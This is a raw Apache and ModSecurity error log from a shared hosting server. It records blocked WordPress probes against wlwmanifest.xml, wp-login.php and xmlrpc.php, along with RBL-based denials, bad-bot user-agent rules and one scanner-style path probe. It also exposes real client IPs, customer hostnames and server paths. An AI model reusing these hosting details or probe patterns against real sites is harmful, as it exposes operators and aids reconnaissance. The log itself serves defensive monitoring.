[Tue May 26 17:04:27.952897 2026] [security2:error] [pid 851641:tid 851775] [client 45.154.98.38:55272] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.ndequipments.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWFQxp8QSN2510avp4tgwAAAAQ"]
[Tue May 26 17:04:28.332959 2026] [security2:error] [pid 851641:tid 851846] [client 45.154.98.38:62574] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.ndequipments.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWFRBp8QSN2510avp4tlwAAAEs"]
[Tue May 26 17:04:28.427786 2026] [security2:error] [pid 851641:tid 851860] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFQxp8QSN2510avp4tiQAAAFk"]
[Tue May 26 17:04:28.695606 2026] [security2:error] [pid 851641:tid 851852] [client 45.154.98.38:65456] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webmail.ndequipments.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWFRBp8QSN2510avp4toAAAAFE"]
[Tue May 26 17:04:29.063376 2026] [autoindex:error] [pid 851641:tid 851835] [client 66.84.95.51:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:04:29.871846 2026] [autoindex:error] [pid 851641:tid 851824] [client 181.214.166.101:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:04:29.969892 2026] [security2:error] [pid 851641:tid 851837] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFRRp8QSN2510avp4tvAAAAEI"]
[Tue May 26 17:04:30.674093 2026] [security2:error] [pid 851641:tid 851650] [remote 193.42.61.12:42610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWFRhp8QSN2510avp4t0wAADAg"]
[Tue May 26 17:04:31.537890 2026] [autoindex:error] [pid 851641:tid 851789] [client 141.164.84.2:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:04:32.312524 2026] [autoindex:error] [pid 851641:tid 851788] [client 181.214.166.101:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:04:32.906811 2026] [security2:error] [pid 851641:tid 851839] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFSBp8QSN2510avp4uHQAAAEQ"]
[Tue May 26 17:04:34.063285 2026] [autoindex:error] [pid 851641:tid 851815] [client 138.229.99.69:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:04:34.483859 2026] [security2:error] [pid 851641:tid 851886] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFShp8QSN2510avp4uSwAAAHM"]
[Tue May 26 17:04:35.603524 2026] [security2:error] [pid 851641:tid 851752] [remote 74.7.241.58:43628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWFSxp8QSN2510avp4ueQAAf24"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes/block-patterns
[Tue May 26 17:04:35.708815 2026] [security2:error] [pid 851641:tid 851791] [client 122.177.247.175:13247] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.247.177.122.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "panda-eco.com"] [uri "/xmlrpc.php"] [unique_id "ahWFSxp8QSN2510avp4ubwAAABQ"]
[Tue May 26 17:04:35.708985 2026] [security2:error] [pid 851641:tid 851791] [client 122.177.247.175:13247] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "panda-eco.com"] [uri "/xmlrpc.php"] [unique_id "ahWFSxp8QSN2510avp4ubwAAABQ"]
[Tue May 26 17:04:37.071895 2026] [security2:error] [pid 851641:tid 851804] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFTBp8QSN2510avp4ungAAACE"]
[Tue May 26 17:04:38.691936 2026] [security2:error] [pid 851641:tid 851891] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFThp8QSN2510avp4u0QAAAHg"]
[Tue May 26 17:04:41.310149 2026] [security2:error] [pid 851641:tid 851821] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFUBp8QSN2510avp4vFgAAADI"]
[Tue May 26 17:04:42.292833 2026] [security2:error] [pid 851641:tid 851892] [client 114.119.138.27:40751] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.athelstan.org.in"] [uri "/sitemap.xml"] [unique_id "ahWFUhp8QSN2510avp4vOwAAAHk"], referer: https://www.athelstan.org.in/sitemap.xml
[Tue May 26 17:04:43.539077 2026] [security2:error] [pid 851641:tid 851859] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFUxp8QSN2510avp4vVQAAAFg"]
[Tue May 26 17:04:45.454162 2026] [security2:error] [pid 851641:tid 851817] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFVRp8QSN2510avp4vhgAAAC4"]
[Tue May 26 17:04:47.841345 2026] [security2:error] [pid 851641:tid 851827] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFVxp8QSN2510avp4v2AAAADg"]
[Tue May 26 17:04:49.021284 2026] [security2:error] [pid 851641:tid 851876] [client 14.226.149.123:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFWBp8QSN2510avp4v8gAAAGk"]
[Tue May 26 17:04:49.296908 2026] [security2:error] [pid 851641:tid 851700] [remote 148.113.128.22:18422] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "dimensioncorporativa.com.co"] [uri "/robots.txt"] [unique_id "ahWFWRp8QSN2510avp4wDQAAYzo"]
[Tue May 26 17:04:49.297117 2026] [security2:error] [pid 851641:tid 851870] [client 148.113.128.22:18422] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "dimensioncorporativa.com.co"] [uri "/robots.txt"] [unique_id "ahWFWRp8QSN2510avp4wDQAAYzo"]
[Tue May 26 17:04:50.069073 2026] [security2:error] [pid 851641:tid 851793] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFWRp8QSN2510avp4wHQAAABY"]
[Tue May 26 17:04:50.779906 2026] [security2:error] [pid 851641:tid 851693] [remote 54.39.89.219:22296] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "dimensioncorporativa.com.co"] [uri "/"] [unique_id "ahWFWhp8QSN2510avp4wOgAAYTM"]
[Tue May 26 17:04:50.780100 2026] [security2:error] [pid 851641:tid 851868] [client 54.39.89.219:22296] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "dimensioncorporativa.com.co"] [uri "/"] [unique_id "ahWFWhp8QSN2510avp4wOgAAYTM"]
[Tue May 26 17:04:51.589534 2026] [security2:error] [pid 851641:tid 851779] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFWxp8QSN2510avp4wTAAAAAg"]
[Tue May 26 17:04:51.702506 2026] [core:error] [pid 851641:tid 851887] [client 205.210.31.26:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:04:51.702543 2026] [core:error] [pid 851641:tid 851887] [client 205.210.31.26:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:04:53.173208 2026] [security2:error] [pid 851641:tid 851778] [client 136.144.42.42:38335] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.42.144.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWFXBp8QSN2510avp4whgAAAAc"]
[Tue May 26 17:04:54.294900 2026] [security2:error] [pid 851641:tid 851833] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFXRp8QSN2510avp4w0gAAAD4"]
[Tue May 26 17:04:56.544228 2026] [security2:error] [pid 851641:tid 851785] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFYBp8QSN2510avp4xEQAAAA4"]
[Tue May 26 17:04:58.597832 2026] [security2:error] [pid 851641:tid 851833] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFYhp8QSN2510avp4xTAAAAD4"]
[Tue May 26 17:05:00.305198 2026] [security2:error] [pid 851641:tid 851646] [remote 79.99.41.110:39864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.41.99.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahWFZBp8QSN2510avp4xeQAAZwQ"]
[Tue May 26 17:05:00.623673 2026] [security2:error] [pid 851641:tid 851794] [client 203.194.101.7:49201] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWFZBp8QSN2510avp4xgQAAABc"]
[Tue May 26 17:05:00.623839 2026] [security2:error] [pid 851641:tid 851794] [client 203.194.101.7:49201] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWFZBp8QSN2510avp4xgQAAABc"]
[Tue May 26 17:05:00.791481 2026] [security2:error] [pid 851641:tid 851884] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFZBp8QSN2510avp4xgAAAAHE"]
[Tue May 26 17:05:00.885890 2026] [security2:error] [pid 851641:tid 851889] [client 185.191.171.17:12738] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/tie-dye/list/"] [unique_id "ahWFZBp8QSN2510avp4xnQAAAHY"]
[Tue May 26 17:05:00.886005 2026] [security2:error] [pid 851641:tid 851889] [client 185.191.171.17:12738] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/tie-dye/list/"] [unique_id "ahWFZBp8QSN2510avp4xnQAAAHY"]
[Tue May 26 17:05:01.557496 2026] [security2:error] [pid 851641:tid 851658] [remote 95.216.117.13:35844] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahWFZRp8QSN2510avp4xtgAAFBA"]
[Tue May 26 17:05:02.109547 2026] [security2:error] [pid 851641:tid 851884] [client 112.86.225.248:40370] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.moes-art.com"] [uri "/"] [unique_id "ahWFZhp8QSN2510avp4xzAAAAHE"]
[Tue May 26 17:05:02.109693 2026] [security2:error] [pid 851641:tid 851884] [client 112.86.225.248:40370] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.moes-art.com"] [uri "/"] [unique_id "ahWFZhp8QSN2510avp4xzAAAAHE"]
[Tue May 26 17:05:02.823059 2026] [security2:error] [pid 851641:tid 851898] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFZhp8QSN2510avp4x2AAAAH8"]
[Tue May 26 17:05:03.960661 2026] [security2:error] [pid 851641:tid 851842] [client 35.204.134.146:24576] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "cpcalendars.plenitudotonal.com"] [uri "/"] [unique_id "ahWFZxp8QSN2510avp4yCgAAAEc"]
[Tue May 26 17:05:03.960811 2026] [security2:error] [pid 851641:tid 851842] [client 35.204.134.146:24576] ModSecurity: Warning. Matched phrase "Scrapy" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "cpcalendars.plenitudotonal.com"] [uri "/"] [unique_id "ahWFZxp8QSN2510avp4yCgAAAEc"]
[Tue May 26 17:05:04.552972 2026] [security2:error] [pid 851641:tid 851836] [client 85.204.70.118:50816] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWFaBp8QSN2510avp4yHgAAAEE"]
[Tue May 26 17:05:04.593311 2026] [security2:error] [pid 851641:tid 851759] [remote 13.42.154.237:54328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.154.42.13.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWFaBp8QSN2510avp4yFAAAC3U"]
[Tue May 26 17:05:05.145747 2026] [security2:error] [pid 851641:tid 851869] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFaBp8QSN2510avp4yKAAAAGI"]
[Tue May 26 17:05:05.456843 2026] [security2:error] [pid 851641:tid 851826] [client 85.204.70.118:50820] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.70.204.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/xmlrpc.php"] [unique_id "ahWFaRp8QSN2510avp4yMQAAADc"]
[Tue May 26 17:05:05.838019 2026] [security2:error] [pid 851641:tid 851642] [remote 178.156.182.155:48650] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWFaRp8QSN2510avp4yQAAAEQA"]
[Tue May 26 17:05:07.213201 2026] [security2:error] [pid 851641:tid 851866] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFahp8QSN2510avp4yagAAAF8"]
[Tue May 26 17:05:07.305221 2026] [security2:error] [pid 851641:tid 851814] [client 130.51.20.151:58610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 151.20.51.130.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWFahp8QSN2510avp4ybwAAACs"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 17:05:07.305338 2026] [security2:error] [pid 851641:tid 851814] [client 130.51.20.151:58610] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWFahp8QSN2510avp4ybwAAACs"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 17:05:07.499312 2026] [security2:error] [pid 851641:tid 851793] [client 85.204.70.118:50826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.70.204.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/xmlrpc.php"] [unique_id "ahWFaxp8QSN2510avp4yhQAAABY"]
[Tue May 26 17:05:07.499422 2026] [security2:error] [pid 851641:tid 851793] [client 85.204.70.118:50826] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "dimensioncorporativa.com.co"] [uri "/xmlrpc.php"] [unique_id "ahWFaxp8QSN2510avp4yhQAAABY"]
[Tue May 26 17:05:07.769936 2026] [security2:error] [pid 851641:tid 851855] [client 130.51.20.151:58678] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWFaxp8QSN2510avp4yhgAAAFQ"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 17:05:08.896352 2026] [security2:error] [pid 851641:tid 851820] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFbBp8QSN2510avp4yngAAADE"]
[Tue May 26 17:05:10.717928 2026] [security2:error] [pid 851641:tid 851845] [client 203.194.101.7:49508] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWFbhp8QSN2510avp4y0gAAAEo"]
[Tue May 26 17:05:10.718048 2026] [security2:error] [pid 851641:tid 851845] [client 203.194.101.7:49508] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWFbhp8QSN2510avp4y0gAAAEo"]
[Tue May 26 17:05:11.614099 2026] [security2:error] [pid 851641:tid 851869] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFbxp8QSN2510avp4y5wAAAGI"]
[Tue May 26 17:05:13.560841 2026] [security2:error] [pid 851641:tid 851789] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFcRp8QSN2510avp4zDwAAABI"]
